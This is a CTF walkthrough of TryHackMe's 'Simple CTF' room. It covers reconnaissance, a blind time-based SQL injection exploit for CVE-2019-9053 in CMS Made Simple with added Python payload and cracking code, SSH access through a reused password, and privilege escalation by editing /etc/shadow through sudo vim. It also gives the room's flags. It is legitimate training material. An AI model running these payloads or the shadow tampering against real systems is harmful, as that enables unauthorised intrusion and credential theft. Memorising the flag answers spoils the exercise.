# TryHackMe "Simple CTF"

<figure><img src="/files/FrgJRRJMPy5yWe0WCvQg" alt="Logo"><figcaption><p>Logo</p></figcaption></figure>

## Introduction

[Simple CTF](https://tryhackme.com/room/easyctf) is an easy room released on August 18th, 2019 by MrSeth6797.

## User Own

### How many services are running under port 1000?

Nmap scan:

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:39 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.xx.xx
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 294269149ecad917988c27723acda923 (RSA)
|   256 9bd165075108006198de95ed3ae3811c (ECDSA)
|_  256 12651b61cf4de575fef4e8d46e102af6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.04 seconds
```

There are **2** services running under port 1000: FTP (vsftpd 3.0.3, with anonymous login allowed) on port 21 and HTTP (Apache 2.4.18) on port 80. Note that the default `nmap` scan only covers the 1,000 most common TCP ports, which is why port 2222 is the only higher port it reports.

### What is running on the higher port?

The higher port is 2222, which is running **SSH** (OpenSSH 7.2p2).

### What's the CVE you're using against the application?

Running `ffuf` to brute-force directories under the web root:

```
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.xx.xx/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.xx.xx/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 104ms]
    * FUZZ: .htaccess

[Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 3131ms]
    * FUZZ: .htpasswd

[Status: 200, Size: 929, Words: 176, Lines: 33, Duration: 103ms]
    * FUZZ: robots.txt

[Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 103ms]
    * FUZZ: server-status

[Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 103ms]
    * FUZZ: simple

:: Progress: [20476/20476] :: Job [1/1] :: 390 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
```

Going to `http://10.10.xx.xx/simple/` shows the system is running CMS Made Simple.

<figure><img src="/files/gwgotEwJvEggwXHsJyOh" alt="http://10.10.xx.xx/simple/"><figcaption><p><code>http://10.10.xx.xx/simple</code></p></figcaption></figure>

The footer of the page gives the CMSMS version as 2.2.8, which is affected by **CVE-2019-9053**.

### To what kind of vulnerability is the application vulnerable?

The description of CVE-2019-9053:

> An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1\_idlist parameter.

CVE-2019-9053 is a SQL injection (**SQLi**) vulnerability: an unauthenticated, blind, time-based injection through the `m1_idlist` parameter of the News module. "Blind" means the page never returns query results directly; "time-based" means each request instead asks the database a yes/no question and the answer is read from how long the response takes.
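The inference loop behind that kind of injection, as an added example that is not code from the room or from the linked exploit script. Each request asks "does the value start with this prefix?", the database answers yes by sleeping, and the loop grows the prefix one character at a time. The table and column names are placeholders, the payload shape is an assumption about how `m1_idlist` is abused (the real injection string is the one in the linked script), and the "server" is a constructed stand-in so the block runs offline.

```python
"""Inference loop behind a time-based blind SQL injection.

Added example, not code from the room or the linked exploit script.  Each
request asks the database one yes/no question ("does the value start with
this prefix?") and the database answers "yes" by sleeping, so a slow
response is a true answer.  Table and column names below are placeholders,
and the payload shape is an assumption about how the m1_idlist parameter
is abused; the real injection string is the one in the linked script.
"""
import time

HEX_CHARSET = "0123456789abcdef"   # enough for a hex salt or an MD5 hash


def build_payload(prefix, delay, table="target_table", column="target_column"):
    """Return the injected m1_idlist value for one guess (assumed shape).

    The prefix is hex-encoded (0x...) so no quote characters are needed,
    and 0x25 ('%') is appended to make the LIKE pattern a prefix match.
    """
    hex_prefix = prefix.encode().hex()
    return (
        f"a,b,1,5)) and (select sleep({delay}) from {table} "
        f"where {column} like 0x{hex_prefix}25) -- "
    )


def timing_oracle(send, delay=2.0, threshold=None):
    """Turn a request function into a prefix oracle based on elapsed time.

    send(payload) issues one request and returns when the response arrives.
    The threshold sits below the requested sleep so jitter does not turn a
    true answer into a false one; raise it if you see false positives.
    """
    if threshold is None:
        threshold = delay * 0.8

    def ask(prefix):
        start = time.monotonic()
        send(build_payload(prefix, delay))
        return time.monotonic() - start >= threshold

    return ask


def extract(ask, charset=HEX_CHARSET, max_len=64):
    """Recover a value one character at a time with a prefix oracle.

    ask(prefix) must return True when the secret starts with prefix.  The
    loop stops when no character in the charset extends the prefix, which
    is either the end of the value or a character outside the charset.
    """
    found = ""
    while len(found) < max_len:
        for ch in charset:
            if ask(found + ch):
                found += ch
                break
        else:
            break
    return found


class FakeVulnerableServer:
    """Constructed stand-in for the target: sleeps only when the LIKE matches."""

    def __init__(self, secret, delay):
        self.secret = secret
        self.delay = delay
        self.requests = 0

    def send(self, payload):
        self.requests += 1
        hex_prefix = payload.split("like 0x", 1)[1].split("25)", 1)[0]
        if self.secret.startswith(bytes.fromhex(hex_prefix).decode()):
            time.sleep(self.delay)


def demo(secret="1dac0d92e9fa6bb2", delay=0.02):
    """Run the extraction against the fake server; returns (value, requests)."""
    server = FakeVulnerableServer(secret, delay)
    ask = timing_oracle(server.send, delay=delay)
    return extract(ask), server.requests


if __name__ == "__main__":
    value, n = demo()
    print(f"recovered {value!r} in {n} requests")
```

Against a real target the per-character cost is what makes these attacks slow and noisy: every guessed character costs a full `sleep()` on a hit, and a request log full of `sleep(` in a News module parameter is an easy detection.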

### What's the password?

Using [this Python script](https://github.com/e-renna/CVE-2019-9053), which exploits CVE-2019-9053, we can pull the password salt, username, email and password hash of the CMS admin user out of the database over the blind injection; with `--crack` it then tries to recover the plaintext from the hash against a wordlist.

```
python3 exploit.py -u http://10.10.xx.xx/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
```

The script cracks the hash to **`secret`**.
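The cracking step done offline, as an added example that is not the linked script. CMS Made Simple 2.2.x stores admin passwords as `md5(salt + password)`, which is what the script's `--crack` mode tries; because the hashing layout is the thing you are least sure of when a hash comes out of an unfamiliar application, this version tries a few common MD5 layouts and reports which one matched. The salt and hash are the values the script printed above; the in-memory wordlist is a constructed stand-in for `best110.txt`.

```python
"""Offline crack of the hash recovered by the script above.

Added example, not the linked exploit script.  CMS Made Simple 2.2.x hashes
admin passwords as md5(salt + password), which is what the script's --crack
mode tries.  A few other common MD5 layouts are tried as well so a miss
tells you whether the wordlist or the assumed scheme was wrong.
"""
import hashlib

# Values reported by the script in the writeup.
SALT = "1dac0d92e9fa6bb2"
HASH = "0c01f4468bd75d7a84c7eb73846e8d96"

# Constructed stand-in for a wordlist such as best110.txt.
WORDLIST = ["123456", "password", "qwerty", "secret", "letmein"]


def _md5(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


SCHEMES = {
    "md5(salt+pass)": lambda salt, pw: _md5(salt + pw),   # CMSMS 2.2.x layout
    "md5(pass+salt)": lambda salt, pw: _md5(pw + salt),
    "md5(pass)":      lambda salt, pw: _md5(pw),           # unsalted, for comparison
}


def hash_with(scheme, salt, password):
    """Hash one candidate under a named scheme."""
    return SCHEMES[scheme](salt, password)


def crack(salt, target_hash, candidates, schemes=tuple(SCHEMES)):
    """Return (scheme, password) for the first candidate that matches, else None.

    Hashes are compared lowercase; candidates may come straight from a file
    (trailing newlines are stripped), so an open wordlist works as input.
    """
    target = target_hash.strip().lower()
    for word in candidates:
        word = word.rstrip("\r\n")
        for scheme in schemes:
            if hash_with(scheme, salt, word) == target:
                return scheme, word
    return None


def crack_file(salt, target_hash, path):
    """Same loop over a wordlist on disk, e.g. best110.txt."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return crack(salt, target_hash, fh)


if __name__ == "__main__":
    print(crack(SALT, HASH, WORDLIST))
```

A single unsalted MD5 (or, as here, MD5 over a site-wide salt) is fast enough that a wordlist of common passwords falls in milliseconds; the same loop over a proper password hash such as bcrypt or scrypt would be slower by orders of magnitude per guess.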

### Where can you login with the details obtained?

Password reuse is common, and the same credentials (`mitch` / `secret`) also work for **SSH** on port 2222.

### What's the user flag?

The user flag is located in `mitch`'s home directory.

```
ssh mitch@10.10.xx.xx -p 2222
mitch@10.10.xx.xx's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Sat Apr 22 05:25:10 2023 from 10.6.xx.xx
$ ls       
user.txt
$ cat user.txt
G00d j0b, keep up!
```

Inside `user.txt` is the user flag, **`G00d j0b, keep up!`**

## System Own

### Is there any other user in the home directory? What's its name?

Looking at the `/home` directory shows another user, **`sunbath`**.

### What can you leverage to spawn a privileged shell?

Using `sudo -l`:

```
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
```

We can run **Vim** as `root` without a password. Anything that can edit arbitrary files as `root` can rewrite `/etc/shadow`, so one route is to replace a privileged user's password hash there and log in as that user. (Vim will also hand out a root shell directly with `:!/bin/sh` from inside the editor, and `sudo vim /root/root.txt` would read the flag outright; the writeup takes the `/etc/shadow` route.)

`mkpasswd -5` hashes the password typed at its prompt with md5crypt and prints it in the `$1$salt$hash` form that `/etc/shadow` accepts. We can replace the hash for `sunbath` with the newly created one.

```
mkpasswd -5 
Password: secret
$1$6o0881Hj$FE4pytde84UUirtTspp0r.
```

`sunbath`'s entry in `/etc/shadow` can then be edited with `sudo vim /etc/shadow`. The second colon-separated field is the password hash; replace it with the hash just generated, leaving the remaining fields untouched.

{% code title="/etc/shadow" %}

```
sunbath:$1$4fbrKI.j$er0GLgKxiXt8L87lHw2Tw1:18125:0:99999:7:::
```

{% endcode %}

`su sunbath` then accepts the new password (`secret`).
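The shadow edit made explicit, as an added example that is not part of the room: it parses shadow-format entries, names the hash algorithm from the `$id$` prefix, and swaps one user's hash field after checking that the replacement is a well-formed crypt(3) hash (a typo in that field silently locks the account, so the check is worth having before `:wq` in `sudo vim`). The `sunbath` line and the replacement hash are the ones shown above; the other two lines are constructed filler.

```python
"""Editing a shadow entry the way the sudo-vim step does, but checked.

Added example, not part of the room.  The sunbath line below is the one
shown in the writeup and the replacement hash is the mkpasswd output above;
the other two lines are constructed filler.  A typo in the hash field
silently locks the account, so the helper validates the new hash first.
"""
import re

SHADOW_FIELDS = (
    "name", "hash", "lastchange", "min", "max", "warn", "inactive", "expire", "flag"
)

# crypt(3) hash identifiers as they appear in the $id$ prefix
HASH_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
            "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

CRYPT_RE = re.compile(r"^\$([0-9a-z]+)\$[^:\s]+$")

# Constructed sample; the sunbath line is the one from the writeup.
SAMPLE_SHADOW = """\
root:$6$constructed$examplehashforroot:18125:0:99999:7:::
mitch:$6$constructed$examplehashformitch:18125:0:99999:7:::
sunbath:$1$4fbrKI.j$er0GLgKxiXt8L87lHw2Tw1:18125:0:99999:7:::
"""

NEW_HASH = "$1$6o0881Hj$FE4pytde84UUirtTspp0r."   # mkpasswd -5 output from the writeup


def parse_shadow_line(line):
    """Split one shadow entry into its nine colon-separated fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != len(SHADOW_FIELDS):
        raise ValueError(f"expected {len(SHADOW_FIELDS)} fields, got {len(fields)}: {line!r}")
    return dict(zip(SHADOW_FIELDS, fields))


def hash_algorithm(hash_field):
    """Name the algorithm from the $id$ prefix, or say why the login is disabled."""
    if hash_field == "":
        return "empty (no password)"
    if hash_field.startswith(("!", "*")):
        return "locked"
    m = CRYPT_RE.match(hash_field)
    if not m:
        return "unknown"
    return HASH_IDS.get(m.group(1), f"unknown id {m.group(1)}")


def replace_hash(shadow_text, user, new_hash):
    """Return shadow_text with user's hash field swapped for new_hash.

    Refuses a hash that is not in $id$salt$digest form (that would lock the
    account) and refuses to invent an entry for a user that is not present.
    """
    if not CRYPT_RE.match(new_hash) or hash_algorithm(new_hash).startswith("unknown"):
        raise ValueError(f"not a usable crypt(3) hash: {new_hash!r}")
    out, hit = [], False
    for line in shadow_text.splitlines():
        entry = parse_shadow_line(line)
        if entry["name"] == user:
            entry["hash"] = new_hash
            hit = True
        out.append(":".join(entry[f] for f in SHADOW_FIELDS))
    if not hit:
        raise KeyError(f"no entry for {user!r}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(replace_hash(SAMPLE_SHADOW, "sunbath", NEW_HASH), end="")
```

On the target the edit itself still happens inside `sudo vim /etc/shadow`; the value of running something like this first is seeing exactly which line must change and confirming the new hash parses as md5crypt before the file is saved.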

### What's the root flag?

The root flag is located in `/root`. `sunbath` is allowed to use `sudo`, so after authenticating with the password just set the flag can be read directly:

```
sudo cat /root/root.txt
[sudo] password for sunbath: 
W3ll d0n3. You made it!
```

Inside `root.txt` is the root flag, **`W3ll d0n3. You made it!`**.

And that's the room!

